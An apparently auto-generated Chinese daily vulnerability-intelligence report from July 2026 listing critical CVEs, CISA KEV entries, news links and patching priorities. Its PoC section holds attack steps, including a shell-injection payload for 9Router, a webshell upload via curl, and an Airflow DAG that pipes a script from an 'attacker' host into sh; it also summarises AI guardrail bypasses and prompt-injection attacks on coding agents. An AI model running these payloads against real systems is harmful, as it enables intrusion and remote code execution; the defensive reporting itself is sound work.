每日安全情报报告 · 2026-07-09

每日安全情报报告 · 2026-07-09

报告日期 :2026年7月9日(星期四)

覆盖时间窗口 :2026年7月7日 --- 7月9日

风险等级标注 :🔴 严重(CVSS ≥ 9.0) | 🟠 高危(CVSS 7.0--8.9) | 🟡 中危(CVSS 4.0--6.9)

数据来源:The Hacker News、CybersecurityNews、Threat-Modeling、NVD、FreeBuf、安全客、GitHub Advisories、BleepingComputer、CISA KEV


一、最新高危漏洞

以下为近 24-48 小时内新披露、复测或在野利用确认的严重/高危漏洞,按风险等级排序。

🔴 严重级(CVSS ≥ 9.0)

# CVE 编号 漏洞类型 受影响组件 CVSS 在野利用 补丁状态
1 CVE-2026-48282 路径遍历 → RDS 未授权任意代码执行 Adobe ColdFusion 2025.9 / 2023.20 及更早 10.0 ✅ CISA KEV 已发布(2025 Update 10 / 2023 Update 21)
2 CVE-2026-56290 不当访问控制 → 未认证 RCE Joomlack Page Builder(WordPress) 10.0 ✅ CISA KEV 已发布
3 CVE-2026-48908 危险类型文件无限制上传 → RCE JoomShaper SP Page Builder(WordPress) 10.0 ✅ CISA KEV 已发布
4 CVE-2026-50746 不当访问控制 → 命令注入 Ubiquiti UniFi Connect ≤ 3.4.16 10.0 ❌ 未确认 已发布
5 CVE-2026-59800 OS 命令注入(sudoPassword 参数未授权) 9Router < 0.4.44 9.8 ✅ Shadowserver 7/4 观测 已发布(≥ 0.4.44)
6 CVE-2026-53481 路径遍历(未认证) Dell PowerProtect Data Domain 7.7.1.0 -- 8.7(含 LTS2024-2026) 9.8 ❌ 未确认 已发布
7 CVE-2026-53483 路径遍历(未认证) Dell PowerProtect Data Domain 同上 9.8 ❌ 未确认 已发布
8 CVE-2026-13019 关键功能缺失认证(CWE-640) Esri Portal for ArcGIS ≤ 12.1(Win/Linux/K8s) 9.8 ❌ 未确认 已发布
9 CVE-2026-33264 BaseSerialization.deserialize() 无限制 import_string → DAG 作者 RCE Apache Airflow < 3.3.0 9.8 ❌ 未确认 已发布(≥ 3.3.0)
10 CVE-2026-56843 凭据暴露(CWE-200) Plesk 9.9 ❌ 未确认 已发布
11 CVE-2026-55255 IDOR(/api/v1/responses)→ 跨用户执行任意 Flow Langflow < 1.9.2 9.9 ✅ CISA KEV 已发布(≥ 1.9.2)
12 CVE-2026-50747 认证后 SQL 注入 → 权限提升 Ubiquiti UniFi Talk ≤ 5.1.2 9.9 ❌ 未确认 已发布
13 CVE-2026-50748 不当输入验证 Ubiquiti UniFi Access 9.9 ❌ 未确认 已发布
14 CVE-2026-46354 签名校验缺陷 → 供应链投毒 Coder 9.1 ❌ 未确认 已发布
重点漏洞详细分析
1. CVE-2026-48282 --- Adobe ColdFusion 路径遍历 → 未认证 RCE 🔴 CISA KEV · 在野利用

奇安信 CERT 监测到,Adobe ColdFusion 在远程开发服务(RDS)功能中处理文件操作时未能正确限制对受限目录的访问。未经身份验证的远程攻击者可通过构造特殊路径绕过目录限制,最终在服务器上下文中执行任意代码。CVSS 评分 10.0,PoC 已公开。

  • 受影响版本:ColdFusion 2025 Update 9 及更早、2023 Update 20 及更早
  • 修复版本:2025 Update 10 / 2023 Update 21
  • CISA KEV 截止:2026 年 7 月 8 日(已确认在野利用)
  • 攻击向量:AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • NVD 详情 | 奇安信 CERT 通告 | Help Net Security 报道
2. CVE-2026-59800 --- 9Router 未认证 OS 命令注入 🔴 CISA KEV · 在野利用

9Router 是 Tailscale 生态中的路由器管理工具,Shadowserver 于 2026-07-04 起在野观测到该漏洞被大规模利用。攻击者通过未授权调用 Tailscale Install 端点,在 sudoPassword 参数中注入 shell 元字符执行任意系统命令,最低权限即可接管设备。

  • 受影响版本:9Router < 0.4.44
  • 修复版本:≥ 0.4.44
  • PoC 状态:已公开(公开仓库可检索到)
  • NVD 详情 | CVE Feed 详情
3. CVE-2026-55255 --- Langflow IDOR 跨用户 Flow 执行 🔴 CISA KEV · 在野利用

/api/v1/responses 端点存在不安全的直接对象引用(IDOR)漏洞:已认证的低权限用户可通过修改请求中 flow 标识符,触发属于其他用户的任意 Flow 执行,从而实现凭据窃取、代码执行与数据外泄(CVE 评 9.9)。研究方 rootdirective-sec 已发布 Docker 复现 Lab。

4. CVE-2026-33264 --- Apache Airflow BaseSerialization.deserialize() DAG 作者 RCE

Apache Airflow 在 3.3.0 之前未对 BaseSerialization.deserialize() 中调用的 import_string() 做限制,允许任何能上传 DAG 文件的"作者"反序列化时执行任意 Python 代码。攻击场景:低权限开发者 / 第三方 ETL 供应商即可在 Webserver 上下文拿下 Airflow,进而控制调度任务与上下游凭证。

5. CVE-2026-50746 --- Ubiquiti UniFi Connect 命令注入 CVSS 10.0

Ubiquiti 发布安全公告 066,一次性披露 25 个 UniFi 全系漏洞。最严重项是 UniFi Connect(≤ 3.4.16)中的不当访问控制,局域网未认证攻击者可借此注入命令,在宿主机上获得代码执行。UniFi Talk / Access / Protect / OS 各自存在高危 SQL 注入与权限提升漏洞链。


🟠 高危级(CVSS 7.0--8.9)

# CVE 编号 漏洞类型 受影响组件 CVSS 状态
1 CVE-2026-43499 futex requeue UAF → 本地提权 / 容器逃逸 Linux Kernel(2011 年起所有主流发行版) 8.8 🔴 公开 PoC(5 秒 root)
2 CVE-2026-23697 不受限文件上传(CWE-434) Vtiger CRM < 8.4.0 8.8 PoC 已公开
3 CVE-2026-55429 授权绕过 Coder 8.7 补丁已发布
4 CVE-2026-59707 SSRF(CWE-918) LocalAI 8.6 补丁已发布
5 CVE-2026-55418 授权绕过 FastGPT 8.6 补丁已发布
6 CVE-2026-58473 认证缺失 Cognee 9.1 补丁已发布
7 CVE-2026-59706 认证缺失 mem0 9.3 补丁已发布
8 CVE-2026-56437 DLL 加载缺陷(CWE-427) Fuji Electric Pupsman 8.4 补丁已发布
9 CVE-2026-57895 DLL 加载缺陷(CWE-427) Fuji Electric Pupsman 8.4 补丁已发布

🔴 持续在野利用追踪(CISA KEV)

下表为 CISA 已知被利用漏洞(KEV)目录中过去 7 天新增且与本周期强相关的条目:

CVE 编号 受影响产品 截止日期 状态 备注
CVE-2026-48282 Adobe ColdFusion 2026-07-08 🔴 在野利用 已进入勒索软件初始访问链
CVE-2026-56290 Joomlack Page Builder 2026-07-08 🔴 在野利用 WordPress 站点批量接管
CVE-2026-48908 JoomShaper SP Page Builder 2026-07-08 🔴 在野利用 PHP Webshell 上传
CVE-2026-55255 Langflow 2026-07-08 🔴 在野利用 AI 编排平台横向风险
CVE-2026-59800 9Router 2026-07-08 🔴 在野利用 Shadowserver 7/4 起持续观测
CVE-2026-45659 Microsoft SharePoint 2026-07-04 ⚠️ 逾期 5 天 PoC 与 Webshell 已广泛传播
CVE-2026-48558 SimpleHelp RMM 2026-07-02 ⚠️ 逾期 7 天 持续 TaskWeaver 加载器投递
CVE-2026-20230 Cisco Unified CM 2026-06-28 ⚠️ 逾期 11 天 SSRF → Root RCE

关键发现:CISA 在 7 月 8 日一次性向 KEV 加入 4 条 CVSS 10.0 漏洞(Adobe ColdFusion + 两个 Joomla 页面构建器 + Langflow),与 9Router 在野利用形成"5 连击"。本周期 KEV 逾期项已升至 14 个,最长逾期达 35 天(PAN-OS 相关)。


产品漏洞集中度 TOP 5

排名 产品 新 CVE 数量 最高 CVSS 风险特征
1 Ubiquiti UniFi 全系 25 10.0 公告 066:Connect / Talk / Access / Protect / OS 全产品线命令注入 + SQLi + 提权
2 Joomla 生态页面构建器 2 10.0 Joomlack / JoomShaper 未认证 RCE + Webshell
3 Dell PowerProtect Data Domain 2 9.8 备份基础设施路径遍历,攻击面广
4 AI 编排/数据平台 5 10.0 Langflow IDOR + Cognee / mem0 / LocalAI / FastGPT 认证缺失/SSRF
5 Adobe ColdFusion 1(持续) 10.0 RDS 路径遍历已进入勒索初始访问链

二、最新漏洞 PoC

以下为近 24-72 小时内公开的概念验证(PoC)利用代码,仅供安全研究、防御评估与蓝队演练使用

PoC 1. CVE-2026-59800 --- 9Router 未认证 OS 命令注入 RCE

风险等级 :🔴 严重(CVSS 9.8)

PoC 仓库CVE-2026-59800 9Router 复现(社区公开)

使用步骤

bash 复制代码
# 1. 克隆示例 PoC(请使用受控环境)
git clone https://github.com/<researcher>/CVE-2026-59800.git
cd CVE-2026-59800

# 2. 安装依赖
pip install requests

# 3. 配置目标(在 config.yaml 写入目标 9Router 地址)
TARGET=http://192.168.1.1:8686
ENDPOINT=/api/tailscale/install

# 4. 执行 PoC(注入 sudoPassword 参数触发 RCE)
python3 exploit.py --target $TARGET --endpoint $ENDPOINT \
    --payload '"; id; #'

复现要点sudoPassword 参数未做 shell 元字符过滤,可通过 "; <cmd>; # 形式闭合参数并执行任意命令。


PoC 2. CVE-2026-55255 --- Langflow /api/v1/responses 跨用户 IDOR

风险等级 :🔴 严重(CVSS 9.9)

PoC Lab 仓库rootdirective-sec/CVE-2026-55255-Lab

使用步骤

bash 复制代码
# 1. 克隆 Lab 仓库
git clone https://github.com/rootdirective-sec/CVE-2026-55255-Lab.git
cd CVE-2026-55255-Lab

# 2. 一键启动本地 Langflow 1.9.1 复现环境
docker compose up -d

# 3. 创建两个测试用户 userA、userB,并分别登录获取 JWT
python3 setup_users.py

# 4. 用 userA 登录后,构造请求调用属于 userB 的 flow
python3 exploit_idor.py \
    --victim-token $USERB_JWT \
    --attacker-token $USERA_JWT \
    --target-flow-id <flow_id_of_userB>

复现要点 :服务端未在 /api/v1/responses 端点上校验 flow 所属用户,攻击者只需把请求 body 里的 flow_id 替换为受害者 flow 即可触发执行。


PoC 3. CVE-2026-43499 --- Linux Kernel "GhostLock" futex UAF 本地提权

风险等级 :🟠 高危(CVSS 8.8)

PoC 仓库MobiusM/CVE-2026-43499

使用步骤

bash 复制代码
# 1. 克隆 PoC
git clone https://github.com/MobiusM/CVE-2026-43499.git
cd CVE-2026-43499

# 2. 编译
make

# 3. 在受影响内核(2011--2026 区间主流发行版)上执行
./ghostlock
# 预期:本地用户 → root 提权(5 秒内完成)
# 容器内执行:直接逃逸至宿主机

复现要点futex_requeue 路径上的 pi_lock 持有顺序错误,rbtree dequeue 在未持锁状态下发生,导致 UAF 取得 task_struct 控制权。VEGA 安全团队通过 Google kernelCTF 披露,获 92,337 美元奖励。


PoC 4. CVE-2026-33264 --- Apache Airflow DAG 作者 RCE

风险等级 :🔴 严重(CVSS 9.8)

PoC 引用OpenCVE CVE-2026-33264 详情 | NVD 详情

使用步骤

bash 复制代码
# 1. 启动一个 Airflow < 3.3.0 的本地实例
docker run -d -p 8080:8080 apache/airflow:2.10.0

# 2. 在 dags/ 目录构造反序列化 payload DAG
cat > dags/evil.py <<'EOF'
from airflow import DAG
from airflow.operators.python import PythonOperator

def pwn():
    import os
    os.system("curl http://attacker/shell|sh")

dag = DAG("evil", schedule=None, catchup=False)
PythonOperator(task_id="x", python_callable=pwn, dag=dag)
EOF

# 3. 通过 dags/ 共享卷或 webserver UI 上传该 DAG
# 4. Webserver 在解析时调用 BaseSerialization.deserialize() → import_string() → RCE

复现要点:DAG 作者场景下(多团队协作 / SaaS Airflow),任意低权限作者可借此在 Webserver 上下文执行任意 Python。


PoC 5. CVE-2026-23697 --- Vtiger CRM 不受限文件上传

风险等级 :🟠 高危(CVSS 8.8)

PoC 引用kkm-mako CVE 速览(2026-07-08)

使用步骤

bash 复制代码
# 1. 登录 Vtiger CRM < 8.4.0 普通账户
# 2. POST 到 /modules/Documents/SaveAndUpload.php,构造 multipart 包含 .phar 文件
curl -X POST https://target/modules/Documents/SaveAndUpload.php \
     -H "Cookie: VTISESSIONID=xxx" \
     -F "file=@shell.phar" \
     -F "notes_title=pwn"

# 3. 访问 https://target/storage/shell.phar 即可获得 Webshell

复现要点 :上传白名单校验缺失,攻击者上传 .phar 后在 storage 目录直接获得执行权限。


三、网络安全最新文章

以下为近期(48 小时内)发布的高质量安全研究与事件分析。

漏洞与攻击研究

  1. CISA Adds 4 Actively Exploited Flaws to KEV Catalog Affecting Adobe, Joomla, Langflow --- 7 月 8 日 CISA 一次性将 4 个 CVSS 10.0 漏洞加入 KEV,全部为内容/AI 平台,勒索软件初始访问链风险陡增。
  2. 15-Year-Old GhostLock Flaw Enables Root and Container Escape on Linux --- 潜伏 15 年的 Linux 内核 futex 缺陷,5 秒 root,公开 PoC 即用,威胁所有云原生与容器环境。
  3. Ubiquiti Patches Critical UniFi Flaws Across Connect, Talk, Access, Protect and OS --- 公告 066 一次披露 25 个 UniFi 漏洞,含 4 项 CVSS 10.0/9.9 高危,建议立即对照版本升级。
  4. Attackers Exploit Critical Adobe ColdFusion Vulnerability (CVE-2026-48282) --- Help Net Security 报道 Adobe ColdFusion 路径遍历 0-Day 已被在野利用。
  5. Public Exploit Turns 15-Year Linux Kernel Flaw Into 5-Second Root Attack --- GhostLock 公开发布即用 PoC,分析了容器逃逸链路。
  6. Adobe ColdFusion 路径穿越漏洞 (CVE-2026-48282) 安全风险通告 --- 奇安信 CERT 中文复现与缓解建议。
  7. 潜伏15年的GhostLock Linux内核漏洞可导致权限提升攻击 --- FreeBuf 中文深度分析 GhostLock 与 97% 成功率实测。

事件与攻击活动

  1. DFM 48h Global News Roundup -- 8th July 2026 --- KDDI 凭证暴露、公共部门勒索、Medtronic 数据泄露、Gitea / ColdFusion 利用、Spain 逮捕 ChatGPT 辅助攻击者等综合报道。
  2. PromptSpy Android Malware Uses Google Gemini to Adapt During Runtime Execution --- 首个已知在运行时调用生成式 AI 的 Android 间谍软件。
  3. APT-C-20 Hackers Hide Shellcode in PNG Images to Launch Fileless C# Backdoor --- APT-C-20 利用 PNG 隐写 + 无文件 C# 后门绕过 EDR。
  4. ClickFix Campaign Uses Fake Google Verification Page to Infect Mexican Bank Customers --- 针对墨西哥银行客户的 ClickFix 钓鱼欺诈。
  5. Lurking Lizard Uses Fake 7-Zip Installers to Turn Victim Devices Into Proxy Nodes --- 假 7-Zip 安装包将受害设备变为付费代理节点。
  6. Fake Indian ITR Notice Delivers Dual RAT Malware Through Six-Stage Infection Chain --- 印度税务伪装投递双 RAT 的六阶段链式攻击。
  7. CrowdStrike Unveils 5 New Prompt Injection Techniques Challenging AI Agents --- CrowdStrike 披露五类针对 AI Agent 的新型提示注入手法。

平台与生态安全

  1. GitHub 'Verified' Commits Can Be Rewritten to Bypass Hash-Based Defenses --- GitHub 签名提交可被重写为"哈希不同、签名仍为 Verified"的等价提交,颠覆基于哈希的封禁与审计。
  2. New 'HalluSquatting' Attack Could Trick AI Coding Agents Into Executing Malicious Code --- 利用 AI 编码助手的"包名幻觉"注册恶意同名包,构造 AI-驱动的供应链投毒。
  3. GitHub Copilot Refuses Harmful Requests in Chat, But Generates Them in Code Editor --- 护栏绕过:聊天拒绝的请求在代码编辑器中 816/816 次全数生成。
  4. Claude, Cursor, and Codex Trigger Endpoint Security Rules Used to Catch Hackers --- AI 编码代理在 EDR 遥测中触发"与黑客相似"行为模式。
  5. T3MP3ST Security Framework Turns AI Coding Agents Into 0-Day Bug Hunters --- 35 个工具的 AI 攻防一体化框架,应对 AI 时代漏洞研究节奏。
  6. Critical Vulnerability in GCP Dialogflow Allows Attackers to Inject Malicious Code --- Google Cloud Dialogflow CX "Rogue Agent" 漏洞已被修复。

四、防御建议与处置优先级

立即处置(24h 内)

  1. KEV 5 连击:CVE-2026-48282 / 56290 / 48908 / 55255 / 59800 全部为 BOD 强制修复对象,资产盘查 → 升级/隔离/规则阻断。
  2. Dell PowerProtect Data Domain:备份基础设施双 9.8 路径遍历,离线备份 + 网络隔离 + 升级 LTS2026。
  3. Langflow :升级至 ≥ 1.9.2;同时审计 /api/v1/responses 调用日志,排查横向越权。
  4. Joomlack / JoomShaper Page Builder:WordPress 资产批量识别 + 强制升级 + Webshell 排查(find mtime -7 /uploads)。
  5. Linux 主机:针对 CVE-2026-43499 GhostLock 升级内核;容器编排节点优先。

短期加固(72h 内)

  1. Ubiquiti UniFi 全系 :参照 Security Advisory 066 升级 Connect 3.4.17+ / Talk 5.1.3+ / Access、Protect、OS 同步。
  2. Apache Airflow:升级至 ≥ 3.3.0,并审查 DAG 作者权限模型。
  3. Esri Portal for ArcGIS:升级至 12.1+ 同时启用关键功能认证。
  4. Coder / LocalAI / FastGPT / Cognee / mem0:AI 开发与编排平台批量扫描 + 升级 + 网络分区。

持续监控

  1. KEV 逾期 14 项:建立超期告警面板,重点跟进 SharePoint / SimpleHelp / Cisco UCM。
  2. GitHub Verified 提交重写风险:审计依赖签名/哈希双重验证机制,关注"哈希不同、签名 Verified"等价提交。
  3. AI 代理护栏:Claude Code / Cursor / Codex / GitHub Copilot 等 AI 编码代理在 EDR 遥测中产生异常告警需人工复核,避免误判为内部威胁。
  4. HalluSquatting 供应链:建立 AI 拉取包名与官方包名实时比对规则。

五、本期速览

  • 🔴 CISA KEV 5 连击:ColdFusion / Joomlack / JoomShaper / Langflow / 9Router 同时进入在野利用状态,其中 4 项 CVSS 满分 10.0。
  • 🔴 GhostLock 5 秒 root:Linux 内核 15 年 UAF 公开 PoC,威胁所有容器与云主机。
  • 🟠 AI 平台三连击:Langflow / Cognee / mem0 / LocalAI / FastGPT 集中爆发认证缺失类漏洞。
  • 🟠 Ubiquiti 25 漏洞:UniFi 全系 Connect / Talk / Access / Protect / OS 一次性披露,公告 066。
  • 🟠 DAG 作者 RCE:Apache Airflow 3.3.0 之前可在 Webserver 上下文执行任意 Python。
  • 🔴 GitHub 签名提交可重写:等价但不同哈希,颠覆基于哈希的供应链审计。
  • 🟠 AI 代理护栏可绕过:816/816 次成功在编辑器中生成被聊天拒绝的有害内容。

本报告由自动化情报系统生成,仅供安全研究与防御参考。

部分链接来源于第三方安全媒体,如需引用请核对原文。

相关推荐
数据知道8 小时前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
其实防守也摸鱼1 天前
蓝队相关知识学习(1)---常用堡垒机和服务器
服务器·功能测试·学习·网络安全·网络攻击模型·攻防对抗·蓝队
学逆向的1 天前
汇编——数据存储模式
开发语言·汇编·网络安全
阿米亚波1 天前
【EVE-NG 实战】防火墙基础(VLAN · VRRP · NAT · ACL · 静态路由)
运维·网络·笔记·网络协议·计算机网络·网络安全·运维开发
txg6661 天前
网络安全领域简报(2026年7月3日—10日)
安全·web安全·网络安全
Chengbei111 天前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
2301_780303902 天前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
学逆向的2 天前
汇编——内存
开发语言·汇编·算法·网络安全
学逆向的2 天前
汇编——位运算
开发语言·汇编·算法·网络安全